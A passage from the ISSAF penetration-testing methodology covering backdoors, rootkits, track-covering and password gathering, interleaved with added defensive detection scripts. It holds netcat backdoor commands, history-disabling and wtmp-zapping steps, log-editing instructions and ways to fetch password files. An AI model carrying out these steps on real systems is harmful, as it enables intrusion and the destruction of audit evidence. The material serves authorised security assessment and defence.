administrator of any possible anomalies. It can be considered as a hybrid of Anomaly
Detection Systems (ADS) and Intrusion Detection Systems (IDS). Many commercial
applications are available based on this technique.
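An added example of the stream profiling idea, not from ISSAF or from any commercial product: a per-protocol signature (mean and spread of payload length and byte entropy) is learned from ordinary ICMP echo payloads, and new echo data fields are scored against it, since the ICMP data field is the carrier the text describes. The ping payload approximation and all observations are constructed.

```python
# Added example, not ISSAF's code: a small stream profiler in the spirit of
# B.8.5.1. It learns a per-protocol signature of regular traffic and flags
# observations that deviate from it. All payloads are constructed.
import math
import statistics
from collections import defaultdict
from typing import Dict, List, Tuple


def shannon_entropy(data: bytes) -> float:
    """Bits per byte of the payload: 0 for empty data, 8 for uniform bytes."""
    if not data:
        return 0.0
    counts: Dict[int, int] = defaultdict(int)
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def features(payload: bytes) -> Dict[str, float]:
    return {"length": float(len(payload)), "entropy": shannon_entropy(payload)}


# Floor on the spread so a perfectly regular baseline (every ping exactly
# 56 bytes) still tolerates small legitimate variation instead of dividing by 0.
MIN_SPREAD = {"length": 4.0, "entropy": 0.25}


class StreamProfile:
    """Signature of regular traffic per protocol, built from observed payloads."""

    def __init__(self) -> None:
        self._samples: Dict[str, Dict[str, List[float]]] = defaultdict(
            lambda: defaultdict(list))

    def learn(self, proto: str, payload: bytes) -> None:
        for name, value in features(payload).items():
            self._samples[proto][name].append(value)

    def signature(self, proto: str) -> Dict[str, Tuple[float, float]]:
        """(mean, spread) per feature; spread is the population stdev with a floor."""
        return {name: (statistics.mean(vals),
                       max(statistics.pstdev(vals), MIN_SPREAD[name]))
                for name, vals in self._samples[proto].items()}

    def anomalies(self, proto: str, payload: bytes, z_max: float = 3.0) -> List[str]:
        """Names of the features whose z-score against the signature exceeds
        z_max. A protocol never seen in the baseline is itself reported."""
        if proto not in self._samples:
            return ["unprofiled-protocol"]
        sig = self.signature(proto)
        flagged = []
        for name, value in features(payload).items():
            mean, spread = sig[name]
            if abs(value - mean) / spread > z_max:
                flagged.append(name)
        return flagged


def ping_payload(seq: int) -> bytes:
    """Constructed approximation of a default 56-byte echo request data field:
    an 8-byte timestamp followed by a fixed incrementing byte pattern."""
    return seq.to_bytes(8, "big") + bytes(range(0x10, 0x40))


def build_baseline(samples: int = 10) -> StreamProfile:
    """Learn the icmp-echo signature from a run of ordinary pings."""
    profile = StreamProfile()
    for seq in range(samples):
        profile.learn("icmp-echo", ping_payload(seq))
    return profile


# Constructed observations to score against the baseline.
NORMAL_PING = ping_payload(11)
# A 512-byte data field with byte values spread evenly, as a tunnelled file
# chunk would look: wrong length and far higher entropy than ping's pattern.
BULK_TRANSFER = bytes((i * 37 + 11) % 256 for i in range(512))
# Right length, but the data field carries text instead of the ping pattern.
TEXT_IN_ECHO = b"cat /etc/passwd\n".ljust(56, b"A")

if __name__ == "__main__":
    profile = build_baseline()
    print("signature:", profile.signature("icmp-echo"))
    for label, obs in (("normal ping", NORMAL_PING), ("bulk transfer", BULK_TRANSFER),
                       ("text in echo", TEXT_IN_ECHO)):
        print(f"{label:14}", profile.anomalies("icmp-echo", obs))
```

Length and entropy are only two of the features such a profiler would track; request rate per host and payload regularity between consecutive packets are natural additions on the same structure.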
B.8.5.2 ACTIVE WARDENS
Active Wardens are akin to a firewall, a network application checking all the traffic and
applying security policies on them. However, unlike firewalls, Wardens remove, modify
or detect any likely carriers (on all network layers) of covert channels. These wardens
alter and distort data passing through them to such an extent that it does not affect the
reception quality at the user level, but eliminates all potential sources of covert
communication. This almost imperceptible modification is called Minimal Requisite
Fidelity. Successful implementation of this technique over live communications is still on
the drawing boards, however the technique is a likely contender.
B.8.5.3 QUANTIZED PUMPS
Quantized Pumps limit covert channels in one-way communication systems. It is an
advancement of traditional one-way communication systems like Store-And-Forward
Protocol, The Pump and Upwards Channel. Each of these legacy techniques have
theoretical and practical limitations like downgraded performance in large covert
channels, hard to analyze and restrictions to precise data rates. However with Quantized
Pumps the bandwidth of covert channels can be controlled precisely.
B.8.6 Countermeasures
B.8.7 Backdoors - Packet Filters
Daemon Shell-UDP. Bind to an allowed source port (e.g. 20).
Steps to be performed:
Step 1:
On the assessor machine type the following:
#nc -p 25 <target system IP address> 5000
Step 2:
On the target system type the following:
#nc -l -v -n -p 5000
B.8.8 Backdoors - Stateful Filters
• Reverse telnets
• Tunnel from Phrack 52
• ssh with the -R option
• ssh with the -L option
B.8.9 Backdoors - Application Level Firewalls
Reverse www shell
• It allows an assessor to access a machine on your internal network from the outside.
• It simply looks like an internal user is browsing the web.
• Its entire traffic is base64 encoded.
• It runs at a specific time of day (the slave).
• The assessor needs to install a simple Trojan program, the Reverse WWW shell server, on a machine in your network.
• The Reverse WWW shell server spawns a back channel to the master.
• As the assessor types into the master system, the command is retrieved and executed on the target system.
B.8.10 Backdoors - Countermeasures
• Allow traffic based on a services access policy. A services access policy clearly
defines what traffic is allowed inside the network and what traffic is allowed to go out
from the network; everything else is denied. Authenticate outbound traffic as per your
policy.
• Use application proxies; it's difficult to establish back channels when they are in use,
but of course it's not impossible.
B.8.11 Root-kits
B.8.11.1 ROOT-KITS - APPLICATION LEVEL
• Lrk5
• T0rnkit
B.8.11.2 ROOT-KITS - KERNEL-LEVEL
• Knark
• Adore
• Solaris LKM
B.9 COVERING THE TRACKS
B.9.1 Hide Files
Description
Hiding files is important for the security assessor/auditor in order to conceal the activities he has
performed during and after compromising the system and to maintain back channel[s].
Objective
Hide tools/exploit used during compromise
Hide tools/exploit used after compromise
Hide key logger output
Hide activities performed from compromised machine against other hosts
Process
UNIX Systems
• Rename the files like “ . “, “ .. “, “ …”, “ .confusing-name ” etc.
• Put the file in multiple/recursive hidden directories.
• Hide the files using root-kits.
Windows Systems
• Hiding the files/directories with attrib +h
• Putting files into un-accessible directories
• Hiding files with file streaming on NTFS
B.9.1.1 HIDE FILES (UNIX)
B.9.1.1.1 RENAME THE FILES LIKE “ . “, “ .. “, “ …”, “ .CONFUSING-NAME ” ETC.
Description
A file name starting with a “ . “, “ .. “ or “ … “ will not appear in a simple listing. If given an appropriately
confusing name with a dot, like .ssh2, it may be ignored by many system administrators. This
is a very basic technique.
Examples/Results
# ls
Desktop     Documents   Library     Movies      Music       Pictures    Public      Sites       books
# ls -al
total 40
drwxr-xr-x  20 balwant  staff  680 Dec 26 02:44 .
drwxrwxr-t   5 root     wheel  170 Nov 11 05:25 ..
-rw-r--r--   1 balwant  staff    4 Dec 26 02:26 ...
-rw-r--r--   1 balwant  staff    3 Nov 11 05:25 .CFUserTextEncoding
drwxr-xr-x   3 balwant  staff  102 Jan 12  1970 .dvdcss
drwx------   3 balwant  staff  102 Feb  3  1970 .ssh
drwx------  11 balwant  staff  374 Dec 25 16:49 Desktop
drwx------   7 balwant  staff  238 Dec 21 15:17 Documents
drwx------  26 balwant  staff  884 Dec 25 16:05 Library
drwx------   3 balwant  staff  102 Nov 11 05:25 Movies
drwx------   4 balwant  staff  136 Dec 25 16:05 Music
drwx------   4 balwant  staff  136 Jan 10  1970 Pictures
drwxr-xr-x   4 balwant  staff  136 Nov 11 05:25 Public
drwxr-xr-x   6 balwant  staff  204 Jan  1  1970 Sites
drwxr-xr-x   2 balwant  staff   68 Dec 25 12:48 books
Analysis/Conclusion/Observation
Countermeasures
Remarks
Put the file in multiple/recursive hidden directories
Putting the files in multiple/recursive hidden directories makes them more difficult to detect. Put
them several directory levels down and name them as discussed in the previous step.
B.9.1.1.2 HIDING THE FILES USING ROOT-KITS
Description
Root-kits come equipped with the functionality to hide files generically. See the root-kits section
for details on using them to hide files.
Examples/Results
[localhost]%ava h file-to-hide
Analysis/Conclusion/Observation
Countermeasures
Remarks
B.9.1.2 HIDE FILES (WINDOWS)
Description
Hiding files in a Windows system is a little easier than in a UNIX system, and most of the methods
are as easy to discover as they are to apply. It is recommended that a security
assessor/auditor have adequate knowledge of DOS.
B.9.1.2.1 HIDE THE FILES/DIRECTORIES WITH ATTRIB +S +H
Description
The attrib command changes the attributes of the mentioned file/directory.
Examples/Results
C:\>attrib +s +h file-name
C:\>attrib +s +h dir-name
Analysis/Conclusion/Observation
• The “+s” option enables the system flag.
• The “+h” option enables the hidden flag.
• Most system administrators re-configure their Explorer settings so that they see
hidden files, but most of them don’t want to see system files (to avoid messing with
them).
Countermeasures
Remarks
B.9.1.2.2 HIDE THE FILES WITH FILE STREAMING ON NTFS
Description
On NTFS, any file can be added into another file’s stream. As per Microsoft, a file stream is
“A mechanism to add additional attributes or information to a file without restructuring the
file system”. This functionality can be abused if an attacker streams a malicious file into some
unsuspicious file.
Pre-requisite
To accomplish this the attacker needs a simple tool, “cp”, from the NT resource kit.
Examples/Results
The following command streams exploit.exe into notepad.exe:
C:\>cp exploit.exe notepad.exe:exploit.exe
The attacker can later un-stream it by using the following command:
C:\>cp notepad.exe:exploit.exe exploit.exe
Analysis/Conclusion/Observation
Countermeasures
Remarks
This functionality is only available on NTFS. If you copy a streamed file to another file
system, you’ll lose your stream.
B.9.1.2.3 PUTTING FILES INTO UN-ACCESSIBLE DIRECTORIES
Description
In a Windows system, if the filename/directory name is a combination of special characters it can’t
be opened without prior knowledge of the combination used by the attacker to rename the
file/directory.
Pre-requisite
Examples/Results
C:\> ren <file / directory name> <Alt+255>
C:\> attrib +h <file / directory name>
Analysis/Conclusion/Observation
The combination appears on the screen as a line “___”. Even if an attempt is made to
delete the said files, the Windows system gives the error “The file does not exist or is moved to
some other location”. To further disguise the file, make it hidden with the attrib +h command.
This is a good way to hide files conveniently and securely. Even for an admin it’s difficult to
delete, read and/or rename since he doesn’t know the combination used to rename the file. The only
way to remove these files is to format the drive.
Countermeasures
Perform dictionary or brute force attack to find out the file name.
Remarks
Write down the tool name if you come across one that does it.
B.9.1.2.4 PUTTING FILES INTO “SPECIAL WINDOWS” DIRECTORIES
Description
It is possible to create “custom” system folders under C:\winnt\system32.
Use the “Special Name”:
• Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
• Internet Explorer.{FBF23B42-E3F0-101B-8488-00AA003E56F8}
• Recycle Bin.{645FF040-5081-101B-9F08-00AA002F954E}
• My Computer.{20D04FE0-3AEA-1069-A2D8-08002B30309D}
• My Documents.{ECF03A32-103D-11d2-854D-006008059367}
• Fonts.{BD84B380-8CA2-1069-AB1D-08000948F534}
Through Explorer, the “correct” system folder is opened, but through a DOS prompt & FTP
these folders are seen as “regular” folders. This allows the storing & uploading of files.
Pre-requisite
These directories have to be created under the C:\winnt\system32 or
C:\windows\system32 directories to be effective.
Examples/Results
C:\WINDOWS\system32>dir contr*
 Volume in drive C is System
 Volume Serial Number is 60F7-93FC

 Directory of C:\WINDOWS\system32

10/08/2004  22:34    <DIR>          Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}
31/03/2003  14:00             8.192 control.exe
               1 File(s)          8.192 bytes
               1 Dir(s)   1.224.241.152 bytes free

C:\WINDOWS\system32\Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}>dir
 Volume in drive C is System
 Volume Serial Number is 60F7-93FC

 Directory of C:\WINDOWS\system32\Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}

10/08/2004  22:34    <DIR>          .
10/08/2004  22:34    <DIR>          ..
               0 File(s)              0 bytes
               2 Dir(s)   1.223.438.336 bytes free
Analysis/Conclusion/Observation
Countermeasures
Remarks
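The tricks in B.9.1.1.1 (dot-only and confusing names), B.9.1.2.3 (names containing Alt+255) and B.9.1.2.4 (CLSID shell-folder suffixes) all leave their trace in the file name itself, so an administrator can sweep a file system for them instead of relying on Explorer or a plain ls. The scanner below is an added example written for this edition; it is not part of ISSAF or of any tool the text mentions. It assumes a POSIX host for the constructed demo tree, represents Alt+255 as U+00A0 (the character the OEM code page maps 0xFF to), and generalizes the six class IDs quoted above to any name ending in .{GUID}.

```python
import os
import re
import tempfile
import unicodedata

# Any directory named "<label>.{GUID}" is treated as a shell-folder disguise,
# not only the six class IDs quoted in B.9.1.2.4 (assumption: generalizing).
CLSID_SUFFIX = re.compile(
    r"\.\{[0-9A-Fa-f]{8}(-[0-9A-Fa-f]{4}){3}-[0-9A-Fa-f]{12}\}$")


def classify_name(name):
    """Return the reasons a file or directory name looks like a hiding trick.

    Checks mirror B.9.1: dot-only names ("...", "...."), names padded with
    whitespace, names carrying control or non-ASCII space characters (the
    Alt+255 trick, typed as 0xFF in the OEM code page = U+00A0), and names
    that end in a Windows shell-folder class ID.
    """
    reasons = []
    if name in (".", ".."):
        return reasons                      # the normal self/parent entries
    if name and set(name) <= {"."}:
        reasons.append("dot-only name")
    if name != name.strip():
        reasons.append("leading/trailing whitespace")
    for ch in name:
        cat = unicodedata.category(ch)
        if cat.startswith("C") or (cat == "Zs" and ch != " "):
            reasons.append("non-printable or unusual space U+%04X" % ord(ch))
            break
    if CLSID_SUFFIX.search(name):
        reasons.append("CLSID shell-folder suffix")
    return reasons


def scan_tree(root):
    """Walk root and map each suspicious path to its list of reasons."""
    findings = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            reasons = classify_name(name)
            if reasons:
                findings[os.path.join(dirpath, name)] = reasons
    return findings


def build_demo_tree():
    """Create a constructed sample tree in a temp dir and return its path."""
    root = tempfile.mkdtemp(prefix="hidescan-")
    deep = os.path.join(root, ".ssh2", "...", "tools")        # recursive dot dirs
    os.makedirs(deep)
    open(os.path.join(deep, "keylog.txt"), "w").close()
    os.makedirs(os.path.join(root, "system32",
                "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"))
    open(os.path.join(root, "report\u00a0"), "w").close()     # Alt+255 style name
    os.makedirs(os.path.join(root, "Documents"))               # benign
    open(os.path.join(root, "Documents", "notes.txt"), "w").close()
    return root


if __name__ == "__main__":
    for path, why in sorted(scan_tree(build_demo_tree()).items()):
        print("%-70s %s" % (path, ", ".join(why)))
```

Run against a real tree (scan_tree("/home") or scan_tree(r"C:\Windows\System32") on Windows), the output is a short list to review by hand; the .ssh2 directory in the demo is deliberately not flagged, because a dotted name that merely looks plausible needs a baseline of known-good dotfiles rather than a name rule.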
B.9.2 Clear Logs
Description
The importance of this stage is easily understood but usually understated. After an attacker
has successfully compromised a system, he will want to keep it without alerting the
administrator, for obvious reasons. The longer the attacker stays on a compromised system,
the better the chances that he will be able to achieve his goals further in the network.
During the process of compromising the system, some suspicious and/or erroneous
activities are logged. A skilled attacker knows that logs need to be doctored. He modifies
them to cover his tracks and disguise his presence.
Methodology
• Check History
• Edit Log files
B.9.2.1 CLEAR LOGS (WINDOWS)
Process
Event Viewer Logs
Web Server Log
Terminal Service Log
Tools
• Elsave
Links
• HTTP://WWW.IBT.KU.DK/JESPER/ELSAVE/
B.9.2.2 CLEAR LOGS (UNIX)
B.9.2.2.1 CHECK HISTORY
Description
The history file in a UNIX system contains recent commands. A skilled attacker preferably
disables the history feature, but in case he needs the history feature for ease of use, he
can delete it after his job is over.
Disabling the history feature of the shell:
#unset HISTFILE && unset SAVEHIST
Linking the history file to /dev/null:
#ln -s /dev/null ~/.bash_history
Pre-requisite
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
Remarks
B.9.2.2.2 EDIT LOG FILES
Description
Complete removal of a log is an indication of some incident. A skilled attacker will always
remove only the relevant log entries.
Step One: Locate the logs
syslog.conf contains the storage path for the log files. The interesting entries in syslog.conf
are the “authpriv”, wtmp, xferlog, maillog and spooler related entries.
#cat /etc/syslog.conf
The default location for these files is the /var/log/ directory. If the admin has changed the
location of these files, the attacker will learn the new location from the /etc/syslog.conf file.
Check the following log files in their default location:
/var/log/messages
/var/log/secure
/var/log/httpd/error_log (log of the particular file exploited)
/var/log/httpd/access_log (log of the exploit run on the webserver)
If the above mentioned files are not available in their default locations, look them up in
syslog.conf.
Step Two: Clear wtmp file
This file is in binary format; the assessor/auditor uses a root-kit program for clearing it. This file is
generally used in conjunction with the who command. Wzap is one such tool. It clears the user
(from the wtmp log) specified by the attacker.
#/opt/wzap
Enter username to zap from wtmp: owned
Opening file…
Opening output file…
Working…
The output file (wtmp.out) will be free from entries for user owned. Simply copy
wtmp.out to wtmp.
#cp wtmp.out /var/log/wtmp
The entries for user owned are erased from wtmp. To make sure, issue the following command:
#who ./wtmp
Step Three: Manually editing the logs
The rest of the log files (messages, secure, xferlog etc.) shall be edited by using any editor
(vi, emacs, nano, joe etc.).
Pre-requisite
Examples/Results
Analysis/Conclusion/Observation
Countermeasures
• Store the log files on difficult-to-modify media. You can use a file system which
supports an append-only flag.
• Log the critical log information on a secure logging host.
• Use log monitoring programs for monitoring and generating alerts.
• Tool: Swatch
Terminology
• utmp: contains information about currently logged in users
• wtmp: contains information about past login sessions, system shutdowns,
system crashes etc.
• lastlog: contains information about the last logged-in user, port and login time.
The above mentioned files are used with the who command.
Remarks
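The wzap walkthrough above removes a user's records from wtmp without leaving a gap, so inspecting wtmp alone will not reveal the edit; what does reveal it is disagreement between two logs that should tell the same story, which is exactly what the remote-logging countermeasure preserves. The checker below is an added example written for this edition, not part of ISSAF or of wzap. It assumes the glibc struct utmp layout used on Linux (384-byte records with 32-bit timestamps) and sshd-style “Accepted ... for <user>” lines as found in /var/log/secure; both the wtmp image and the log lines are constructed inline.

```python
import re
import struct

# glibc struct utmp on Linux (x86 and x86_64): 384-byte records, 32-bit
# ut_tv fields. Other UNIX flavours use different layouts (assumption).
UTMP_FORMAT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FORMAT)          # 384
USER_PROCESS, DEAD_PROCESS = 7, 8                 # ut_type values from <utmp.h>

SSHD_ACCEPT = re.compile(r"Accepted \S+ for (\S+) from (\S+)")


def _cstr(raw):
    """Decode a NUL-padded fixed-width field."""
    return raw.split(b"\0", 1)[0].decode(errors="replace")


def pack_utmp(ut_type, pid, line, user, host, tv_sec):
    """Build one wtmp record; used only to construct the sample image below."""
    return struct.pack(UTMP_FORMAT, ut_type, pid, line.encode(), b"",
                       user.encode(), host.encode(), 0, 0, 0, tv_sec, 0,
                       0, 0, 0, 0)


def parse_wtmp(data):
    """Yield (ut_type, pid, line, user, host, tv_sec) for every whole record."""
    for off in range(0, len(data) - len(data) % UTMP_SIZE, UTMP_SIZE):
        f = struct.unpack_from(UTMP_FORMAT, data, off)
        yield f[0], f[1], _cstr(f[2]), _cstr(f[4]), _cstr(f[5]), f[9]


def wtmp_login_users(data):
    """Users with at least one USER_PROCESS (login) record in wtmp."""
    return {rec[3] for rec in parse_wtmp(data) if rec[0] == USER_PROCESS}


def authlog_users(lines):
    """Users that sshd reports as successfully authenticated."""
    return {m.group(1) for m in map(SSHD_ACCEPT.search, lines) if m}


def missing_from_wtmp(wtmp_data, authlog_lines):
    """Users accepted by sshd but absent from wtmp: a tampering indicator
    (or, more benignly, a session type that never writes wtmp)."""
    return sorted(authlog_users(authlog_lines) - wtmp_login_users(wtmp_data))


# Constructed sample: three wtmp records and three sshd lines. The login of
# "owned" appears in the auth log but its wtmp record has been zapped.
SAMPLE_WTMP = b"".join([
    pack_utmp(USER_PROCESS, 2001, "pts/0", "balwant", "10.0.0.7", 1104019200),
    pack_utmp(DEAD_PROCESS, 2001, "pts/0", "", "", 1104022800),
    pack_utmp(USER_PROCESS, 2044, "pts/1", "alice", "10.0.0.9", 1104026400),
])
SAMPLE_SECURE = [
    "Dec 26 02:00:00 host sshd[2001]: Accepted password for balwant from 10.0.0.7 port 4022 ssh2",
    "Dec 26 02:30:00 host sshd[2020]: Accepted password for owned from 10.0.0.5 port 4101 ssh2",
    "Dec 26 03:00:00 host sshd[2044]: Accepted publickey for alice from 10.0.0.9 port 4390 ssh2",
]


def check_live_host(wtmp_path="/var/log/wtmp", secure_path="/var/log/secure"):
    """Run the same comparison against a real host's files."""
    with open(wtmp_path, "rb") as w, open(secure_path, errors="replace") as s:
        return missing_from_wtmp(w.read(), s.readlines())


if __name__ == "__main__":
    print("accepted by sshd but missing from wtmp:",
          missing_from_wtmp(SAMPLE_WTMP, SAMPLE_SECURE))   # ['owned']
```

The comparison is only as good as the second source: if the auth log lives on the same host it can be edited in the same sitting, so feed check_live_host a copy of the log collected by the remote logging host rather than the local file.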
B.9.3 Defeat Anti-virus
Sometimes anti-virus software doesn’t allow you to implement a root-kit. First disable the anti-virus,
then implement it.
B.9.4 Implement Root-kits
[Text]
B.9.5 Defeat integrity checking
[Text]
B.9.6 Account Entry Editing
[Text]
B.10 AUDIT
Perform security audit wherever penetration testing can not be performed or is not
appropriate.
B.11 REPORTING
The reporting should follow a well documented structure. Things that should definitely be
in the report are the following parts:
• Management summary
• Scope of the project (and out-of-scope parts)
• Tools that have been used (including exploits)
• Dates & times of the actual tests on the systems
• Every single output of tests performed (excluding vulnerability scan reports, which
can be included as attachments)
• A list of all identified vulnerabilities with recommendations on how to
“cure” the vulnerabilities found.
• A list of action points (which recommendation to perform first, what is the
recommendation curing?)
Refer to the Appendix for a template.
B.12 CLEAN UP AND DESTROY ARTIFACTS
All information that is created and/or stored on the tested systems should be removed
from these systems. If this is for some reason not possible remotely, all
these files (with their location) should be mentioned in the technical report so that the
company's technical staff will be able to remove them after the report has been received.
This list should be very detailed so that the system administrators can do their job without
having to rebuild the system.
C PASSWORD SECURITY
Description
This chapter covers the use of passwords during the security process, mainly used for
authentication and/or authorization purposes, but also for encryption, protection of
configuration options/screens, etc.
The first part contemplates different scenarios on obtaining the encrypted or hashed
version of the passwords for offline cracking. The second part contemplates the cracking
process itself.
The first part is rather vague, because the ways to gather authentication credentials can
vary from one system or application to another, so only general advice is provided. Please
refer to other chapters of ISSAF for details on vulnerability exploiting, privilege
escalation, SQL Injection, etc.
Security of the password processing using encryption techniques is discussed, together
with the pitfalls of not using encryption at all.
Different encryption algorithms are mentioned, and an overview of the cracking process
for the most common ones is presented as examples.
The importance of good password selection is highlighted, in line with the use of
appropriate password policies and reasonably secure encryption algorithms.
A briefing on the nature of "publicly known" versus "proprietary" encryption algorithms is
presented; their advantages and disadvantages.
The authentication credentials gathering process is shown from two different points of
view: that of a penetration tester, and that of a security auditor, in several different
scenarios.
C.1 FIRST PART: AUTHENTICATION CREDENTIALS GATHERING
C.2 OBJECTIVE
Describe the process of gathering authentication credentials during a penetration test or
a security audit, showing examples of the use of common tools against the most widely
deployed protection schemes.
Instruct the IT security professionals in the importance of good password selection,
together with the proper encryption algorithm.
C.3 EXPECTED RESULTS
Demonstrate how the selection of bad passwords, bad password policies, improperly
implemented/coded security, and/or inadequate encryption algorithms can jeopardize
the security of the infrastructure.
C.4 METHODOLOGY
The methodology to use will vary in different scenarios:
• Low privilege, remote network
• Low privilege, local network
• Low privilege, local host
• High privilege, remote network
• High privilege, local network
• High privilege, local host
The meaning of Low and High privileges is directly related to the type of analysis to
perform. Is the person performing the audit a penetration tester with low privileges, or a
security auditor with high (administrative) privileges?
In the case of having administrative privileges the process can be quite straightforward,
so the reading of the first 3 cases is highly recommended even for security auditors.
There are other factors that partially affect the methodology chosen, mainly related to the
application that’s using the password.
This flowchart depicts the attack tree for the potentially possible tests in search of
passwords or sensitive information that can be used to gain access to a given system.
C.5 STEP ONE: NETWORK AUTHENTICATION CREDENTIALS GATHERING AS
AN OUTSIDER PENETRATION TESTER (LOW PRIVILEGE)
C.5.1 Description
The penetration tester usually has only a connection to the Internet.
The risk of external intruders is the main concern, so the penetration tester has to
proceed as such an intruder would and, in what regards this module, try to gather
information about the passwords and how to get them from the outside.
The main barriers to face are firewalls, which restrict the services available to attack, and IP
address based ACLs, which restrict who can try to authenticate using passwords to a
given service.
The next flow diagram depicts the situation faced by the penetration tester.
Objective
Describe the process of obtaining different types of commonly used authentication
credentials, from the perspective of a penetration tester.
The password cracking once the encrypted or hashed passwords have been obtained is
described in a separate section.
C.5.2 Expected Results
If passwords can be obtained by an outsider, something is badly configured.
Passwords not appropriately chosen will be cracked in a short time.
Good passwords will take some time to be cracked if the encryption algorithm used is
not very solid for today’s standards.
Good passwords can’t be cracked at all (except by luck!) if the encryption algorithm used
has no pitfalls that jeopardize its security.
C.5.3 Process (Steps to complete this task)
The general overview of the process to obtain passwords implies the following steps:
1. determine the different uses of passwords in the remote system for authentication
and/or authorization purposes
2. determine if encryption is in use
3. determine the encryption algorithm used
4. obtain the plaintext password, encrypted password or hashes (depending on
points 2 and 3 above; if no encryption is used the process ends here)
5. choose the proper password analysis tool (password cracker)
6. attack the encrypted password or hash with the proper method, depending on the
methods available in the tool and the maximum time available for the cracking
As a penetration tester, usually the privileges are the lowest possible, i.e. no access
allowed at all to resources, and this will affect mainly step 4 above, and in some cases
all steps from 2 to 4. This can have the effect that, to determine 2 and 3, step 4 has to be
performed first, depending on the particular case.
C.5.4 Example uses of common testing tool(s)
The first thing to consider if you’re connecting from the Internet is that it’s very unlikely that
there’s any kind of access to the stored unencrypted/encrypted passwords or their
hashes, so getting some kind of foothold, at least as an unprivileged user, in the internal
network is a must.
Other than the above, the first step is to do an assessment of the remote system to
determine any use of passwords in it (authentication/authorization). Typically, this
implies doing a port scan of the remote system and a subsequent connection to all open ports
to assess if there are any password-aware applications used there.
Examples are: restricted areas of a webserver, webmail, administrative/configuration
applications in servers and devices, SMB/CIFS authentication via NetBIOS ports,
Terminal Services, etc.
SMB/CIFS logins and Terminal Services (that use the same authentication) must not be
exposed to the Internet. Block them at the border firewall. If, for example, Terminal
Services needs external connection, try to implement a VPN solution for that, or at least
ensure the use of extremely strong passwords for the remote accounts.
In addition to the general statement above we can find:
• Passwords obtained abusing SQL Injection in a web application
• Password hashes from the names.nsf database of a badly configured Lotus Domino
• .passwd files in a badly configured Apache server
• Administrative password in badly configured CISCO routers
• Passwords stored in the clear in comment fields in the information obtained by abusing SNMP
• Passwords stored in the clear in answer to finger requests
• Passwords stored in the clear in comments in the source code of HTML pages
Most cases are covered by their own ISSAF chapter, so for SQL Injection here I will only
mention how to proceed once the passwords have been obtained, but this will be
dependent on the implementation. The passwords can be anything from unencrypted to
encrypted or hashed with any known or unknown algorithm. Here are examples of
how the plaintext ‘password’ looks when encrypted/hashed with some very common
algorithms; perhaps this will help you to decide which password cracker to try.
Plaintext: password
Algorithm      Ciphertext / Hash
MD2            F03881A88C6E39135F0ECC60EFD609B9
MD4            8A9D093F14F8701DF17732B2BB182C74
MD5            5F4DCC3B5AA765D61D8327DEB882CF99
SHA-1          5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8
RIPEMD-160     2C08E8F5884750A7B99F6F2F342FC638DB25FF31
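The table above shows that the same plaintext yields a 32-character hex digest under MD2, MD4 and MD5 and a 40-character one under SHA-1 and RIPEMD-160, so the length and charset of a stored digest narrow the candidate algorithms but cannot settle them. The audit below, an added example written for this edition and not part of ISSAF, turns that observation into the check this step recommends later (audit the passwords of Internet-exposed applications and force the weak ones to change): it takes constructed (username, stored digest) entries, narrows the algorithm by length, and reports accounts whose unsalted digest equals the digest of a password on a banned list. It uses only Python's hashlib, which normally offers MD5 and SHA-1 but not MD2, so MD2-stored entries are skipped rather than guessed.

```python
import hashlib

# Digest lengths (hex characters) of the unsalted algorithms in the table above.
# Length alone cannot separate MD2/MD4/MD5 or SHA-1/RIPEMD-160.
CANDIDATES_BY_LENGTH = {32: ("md2", "md4", "md5"), 40: ("sha1", "ripemd160")}

# Constructed banned list; a real audit would use a much larger wordlist.
BANNED_PASSWORDS = ["password", "123456", "admin"]


def candidate_algorithms(hexdigest):
    """Algorithms a stored digest could belong to, judged by length and charset."""
    h = hexdigest.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return ()
    return CANDIDATES_BY_LENGTH.get(len(h), ())


def available_algorithms(names):
    """Keep only the algorithms this Python build's hashlib can compute."""
    return tuple(n for n in names if n in hashlib.algorithms_available)


def banned_match(hexdigest, banned=BANNED_PASSWORDS):
    """(algorithm, password) if the unsalted digest equals a banned password's
    digest under any computable candidate algorithm, else None."""
    h = hexdigest.strip().lower()
    for algo in available_algorithms(candidate_algorithms(h)):
        for pw in banned:
            try:
                digest = hashlib.new(algo, pw.encode()).hexdigest()
            except ValueError:          # listed by OpenSSL but not usable
                break
            if digest == h:
                return algo, pw
    return None


def audit(entries, banned=BANNED_PASSWORDS):
    """entries: iterable of (username, stored hex digest).
    Returns {username: (algorithm, password)} for accounts that must change."""
    weak = {}
    for user, digest in entries:
        hit = banned_match(digest, banned)
        if hit:
            weak[user] = hit
    return weak


# Constructed credential store: two weak accounts (digests taken from the
# table above) and one strong account whose digest is computed here.
SAMPLE_STORE = [
    ("alice", "5F4DCC3B5AA765D61D8327DEB882CF99"),            # MD5("password")
    ("bob",   "5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8"),    # SHA-1("password")
    ("carol", hashlib.sha1(b"correct-horse-battery-9Q!").hexdigest()),
]

if __name__ == "__main__":
    for user, (algo, pw) in sorted(audit(SAMPLE_STORE).items()):
        print(f"{user}: unsalted {algo} of banned password {pw!r}; force a change")
```

Because every candidate algorithm here is unsalted, one digest computation per banned word serves the whole store; that is the property that makes these formats weak, and it is the reason the same audit against a salted, slow scheme would need one computation per account and per word.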
The second case can be as simple as:
http://domino_server/names.nsf
Either ‘as is’ or complemented with any of the Domino vulnerabilities you can find on
SecurityFocus (http://www.securityfocus.com/).
The third case is also quite straightforward if the Apache server isn’t configured to deny
the password files (denying them is the default configuration, if their name is .passwd),
and as long as you know which directory to look into (the _secret_ path below):
http://apache_server/_secret_/.passwd
The fourth and fifth cases can be found in a situation where the device is listening to
SNMP and responds to the read/write community name (that could be ‘public’, ‘private’,
etc.).
One of the best tools to interrogate SNMP aware devices is the IP Network Browser, one
of the components of the SolarWinds package (http://www.solarwinds.net/).
In the fourth case you have to download the OLD-CISCO-SYS-MIB file by tftp (either by
